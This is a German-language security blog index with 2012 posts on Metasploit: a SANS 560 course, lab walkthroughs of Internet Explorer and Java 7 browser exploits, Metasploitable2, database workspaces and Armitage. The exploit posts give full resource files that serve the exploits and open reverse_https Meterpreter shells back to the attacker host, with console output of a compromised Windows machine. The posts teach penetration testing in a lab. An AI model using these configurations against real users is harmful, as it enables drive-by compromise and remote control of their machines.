London 2012 – SANS Security 560

Greetings to all participants! Special Thanks to the London 2012-SANS 560 Team, particularly to Bryce Galbraith as an excellent instructor.

Greetings to Markus and the rest of the winning team.  Good luck for the future.

Für den Lehrgang sollte ein eigener Laptop zur Verfügung stehen. Als Hostbetriebssystem eignet sich Windows, Linux oder MacOS. Als Software sollte VMWare Player oder Workstation vorhanden sein.  Ein VMWare- Image (Linux-Fedora) mit allen Tools wird auf DVD  zur Verfügung gestellt.  Die Verwendung eines Windows-Systems (als VMWare oder als Host) ist dringend zu empfehlen. Hier ein Überblick über den Inhalt des Kurses:

WeiterlesenLondon 2012 – SANS Security 560

Internet Explorer 0-Day – Metasploit-Modul

Am 17.09.2012 wurde eine kritische Schwachstelle Microsoft Internet Explorer bekannt.  Betroffen sind IT-Systeme, die die Software in den Versionen 6, 7, 8 oder 9 unter den Betriebssystemen Microsoft Windows XP, Microsoft Windows Vista oder Microsoft Windows 7 verwenden. Die Schwachstelle wird bereits in gezielten Angriffen ausgenutzt. Um die Schwachstelle auszunutzen reicht es aus, den Internetnutzer auf eine präparierte Webseite zu locken. Beim Anzeigen dieser Webseite kann dann durch Ausnutzen der Schwachstelle beliebiger Code auf dem betroffenen System mit den Rechten des Nutzers ausgeführt werden.

Um die eigenen Systeme testen zu können, wurde ein Metasploit-Modul herausgebraucht.

Im Folgenden wird die Handhabung in einem Testnetzwerk kurz beschrieben und in einem Video erläutert. Der Angreifer nutzt Backtrack 5 R3 (IP: 192.168.222.16) und das Metasploit-Framework.  Auf dem Zielsystem (IP: 192.168.222.71) ist Windows 7 und der Internet Explorer 8 installiert.

Mittels der folgenden  Resource-Datei (ie0day.rc) wird das entsprechende Module geladen, die Serverparameter eingestellt und der Payload ausgewählt. Nach der Ausführung nimmt das  Angriffssystem „Anfragen“ auf Port 80 entgegen.

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.222.16
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.222.16
set LPORT 443
set URIPATH /
exploit

									

Sobald das Zielsytem die URL http://192.168.222.16 im Internet Explorer öffnet, wird der Exploit ausgeführt und der entsprechende Payload (in diesem Fall windows/meterpreter/reverse_https) nachgeladen.  Nun können beliebige Meterpreter-Skripte ausgeführt werden. Im  Video werden die Nutzerrechte zu Systemrechten eskaliert und die Passwort-Hashes ausgelesen.

WeiterlesenInternet Explorer 0-Day – Metasploit-Modul

Java 0 Day – Metasploit Modul

Die derzeitige Java Version 7  (Update 1-6) enthält eine Sicherheitslücke, die bereits gezielt im Focus der Angreifer liegt. Die Lücke erlaubt durch den Besuch von präparierten Webseiten, Schadcode auf den eigenen PC einzuschleusen und auszuführen. Betroffen sind alle 7 er Versionen von Java.
Wer das Java-Plug-in im Browser nicht nutzt, tut gut daran es auch bis zum Erscheinen eines Patches von Oracle nicht zu aktivieren.
Alle anderen Anwender sollten überlegen, das Plugin zeitweise oder auch für immer zu deaktivieren.
Rapid7 stellt eine Webseite zur Verfügung, wo jeder Anwender seine derzeitige Konfiguration prüfen kann.

Ein Metaspoilt-Modul steht seit dem 26.08.12 zur Verfügung.  Im Folgenden wird erläutert, wie man einen Test in einer gesicherten Laborumgebung durchführen kann. Als Angreifer wird Backtrack 5 R3 (IP: 192.168.222.16) genutzt. Der  Opfer-PC (IP: 192.168.222.77)  ist mit Windows XP und Chrome ausgestattet.

Schritt 1 –  Metasploit Resource-Datei ( java0day.rc)  mit einem Texteditor erstellen. Dabei die IP-Adresse des „Angreifers“ entsprechend anpassen:

use exploit/multi/browser/java_jre17_exec
set payload java/meterpreter/reverse_https
set srvhost 192.168.222.16
set srvport 80
set uripath /
set lhost 192.168.222.16
set lport 443
exploit


									

Schritt 2 – Resource-Datei in der Metasploit-Konsole ausführen

msf > resource /home/scripts/java0day.rc 
[*] Processing /home/scripts/java0day.rc for ERB directives.
resource (/home/scripts/java0day.rc)> use exploit/multi/browser/java_jre17_exec
resource (/home/scripts/java0day.rc)> set payload java/meterpreter/reverse_https
payload => java/meterpreter/reverse_https
resource (/home/scripts/java0day.rc)> set srvhost 192.168.222.16
srvhost => 192.168.222.16
resource (/home/scripts/java0day.rc)> set srvport 80
srvport => 80
resource (/home/scripts/java0day.rc)> set uripath /
uripath => /
resource (/home/scripts/java0day.rc)> set lhost 192.168.222.16
lhost => 192.168.222.16
resource (/home/scripts/java0day.rc)> set lport 443
lport => 443
resource (/home/scripts/java0day.rc)> exploit
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.222.16:443/
[*] Using URL: http://192.168.222.16:80/
msf  exploit(java_jre17_exec) > [*] Server started.


									

Schritt 3 – Öffnet ein Anwender die angegebene URL (http://192.168.222.16)  am „Opfer-PC“ mit dem Browser Chrome, so wird die Schwachstelle ausgenutzt und eine (reverse) Meterpreter-Session zum „Angreifer“ eingerichtet.

In diesem Fall erhält der Angreifer Nutzerrechte auf dem System. Als nächsten Schritt würde er versuchen, die Rechte zu eskalieren bzw. weiter in das interne Netzwerk einzudringen (Pivoting).

[*] 192.168.222.77   java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.222.77   java_jre17_exec - Sending Applet.jar
[*] 192.168.222.77   java_jre17_exec - Sending Applet.jar
[*] 192.168.222.77:1706 Request received for /INITJM...
[*] Meterpreter session 1 opened (192.168.222.16:443 -> 192.168.222.77:1706) at 2012-08-28 17:56:42 +0200

msf  exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f cmd.exe -c -H
Process 1 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Dokumente und EinstellungenfrankLokale EinstellungenAnwendungsdatenGoogleChromeApplication16.0.912.75>
									

Weitere  Beispiele findet man dazu u.a. im Buch (Szenario 5.15) ab Seite 222.

Die Vorgehensweise ist hier nochmal im Video dargestellt:

[youtube YogKqpdkezw]

Hier ein Video mit Windows-Meterpreter-Payload:

[youtube kCeqTjhzq_A]

Update 30.08.2012: Oracle  hat heute überraschend eine neue Version (Java 7,  Update 7) herausgegeben.  Die derzeit verfügbaren Exploits sind nicht mehr funktionell.

 

 

Metasploitable2 für die Testumgebung

Mit Metasploitable 2  hat Rapid7 neues „Futter“ für die Testumgebung geliefert. Dabei handelt es sich um eine virtuelle Maschine auf der Basis von Ubuntu,  die viele Schwachstellen enthält.  Sie lädt geradezu zum Testen ein.   Neben bekannten Java- , Apache- und PHP- Schwachstellen, wird auch der FTP-Server vsftpd mit einer  Backdoor gezeigt. Darüber hinaus kann man die installierten Webapplikationen einen Penetrationstest unterziehen.

Eine Auflistung aller Schwachstellen findet man hier. Die virtuelle Maschine lässt sich nach dem Download sehr leicht in die Testumgebung integrieren. Dabei lassen sich sowohl VMWare-Produkte als auch VirtualBox nutzen. Hier findet man ein Video, das die Integration des VMWare-Images in VirtualBox Schritt für Schritt beschreibt.

WeiterlesenMetasploitable2 für die Testumgebung

Penetration Testing mit Metasploit 2. Auflage

Liebe Leser,

Ende Mai 2012 wird das Buch „Penetration Testing mit Metasploit“ in der 2. Auflage im dpunkt.verlag erscheinen. Es wurde gründlich überarbeitet und ist nunmehr auf fast 300 Seiten angewachsen. Trotzdem ist und bleibt es eine praktische Einführung in die Thematik. Aus den zahlreichen Anmerkungen und Rückmeldungen konnte ich entnehmen, dass das Buch vielen Lesern den Einstieg in das Penetration Testing  erleichtern konnte. Besonders hat vielen Lesern die Beschreibung des Aufbaus einer Testumgebung gefallen, in der man die praktischen Beispiele im Kapitel 5 des Buches selbst nachvollziehen konnte.

WeiterlesenPenetration Testing mit Metasploit 2. Auflage

Backtrack 5 PostgreSQL Datenbank und Workspaces

Die Einträge innerhalb der Datenbank werden über sogenannte „Workspaces“ verwaltet. So kann man jedem Projekt einen bestimmten Bereich in der Datenbank zuordnen. Workspaces können neu erstellt, angezeigt  und gelöscht werden.  Nachfolgend werden die Befehle dazu aufgelistet.

msf > workspace -h
Usage:
    workspace                  List workspaces
    workspace [name]           Switch workspace
    workspace -a [name] ...    Add workspace(s)
    workspace -d [name] ...    Delete workspace(s)
    workspace -h               Show this help information

									

In Backtrack 5 ist die  Datenbank mit Namen msf3 zur Nutzung voreingestellt.

WeiterlesenBacktrack 5 PostgreSQL Datenbank und Workspaces

Metasploit mit PostgreSQL und Backtrack 5 R1 nutzen

Auf Seite 61 des Buches (Listing 4-3) wird beschrieben, wie man mittels der Befehle db_driver und db_connect Datenbanken in Verbindung mit dem  Metasploit Framework nutzen kann. Leider wird in der aktuellen Version von Backtrack 5 R1 nur noch PostgreSQL standartmäßig unterstützt. Das Buch beschreibt in der weiteren Folge aber die Nutzung der MySQL-Datenbank.

WeiterlesenMetasploit mit PostgreSQL und Backtrack 5 R1 nutzen

Metasploit Community erschienen

Mit der Veröffentlichung von Metasploit Community konnte Rapid7 zum zweijährigen Firmenjubiläum mit einer  Überraschung  aufwarten. Am 18.Oktober 2011 stellte HD Moore diese Version der Community vor.

Mit Metasploit Pro hatte Rapid7 eine bewährte Plattform für professionelle Penetrationstester und IT-Experten geschaffen. Viele kleinere Unternehmen können sich diese Software auf Grund ihrer wirtschaftlichen Situation aber nicht leisten und nutzten stattdessen weiterhin das Metasploit Framework.

Um auch diese Nutzer eine einfache end effektive Suche nach Schwachstellen in ihren IT-Systeme zu ermöglichen, hat Rapid7 sich entschlossen eine Community-Version zu veröffentlichen.

WeiterlesenMetasploit Community erschienen

Armitage Multi-Player-Modus

Der Security Engineer Raphael Mudge lebt in Washington D.C. und hat neben weiteren Projekten eine GUI  für das Metasploit-Framework entwickelt.  Auf der Homepage bezeichnet er es als „Cyber Attack Management“  Tool für Metasploit.  Nach seiner Aussage hat Mudge  sehr viele Security Professionals getroffen, die nicht wussten wie sie Metasploit für ihre Arbeit nutzen sollten. Das war Antrieb genug eine nichtkommerzielle GUI  zu entwickeln.

Armitage ist in die Backtrack5 Oberfläche integriert. Ein Test lohnt sich.

Als sehr interessantes Feature möchte ich heute die Multi-Player Eigenschaften vorstellen. Diese ermöglichen einem Team,  Datenbanken gemeinsam zu nutzen. Dabei kann jedes Teammitglied alle Host Informationen, Netzwerk-Scans und Sessions  nutzen. Hat z.B. ein Nutzer ein Host penetriert, so werden diese Daten automatisch allen Mitgliedern zur Verfügung gestellt. Es können auch Meterpreter-Sessions gemeinsam genutzt werden. Somit wird eine zeitgleiche Darstellung aller Informationen in den Konsolen der Nutzer möglich.

WeiterlesenArmitage Multi-Player-Modus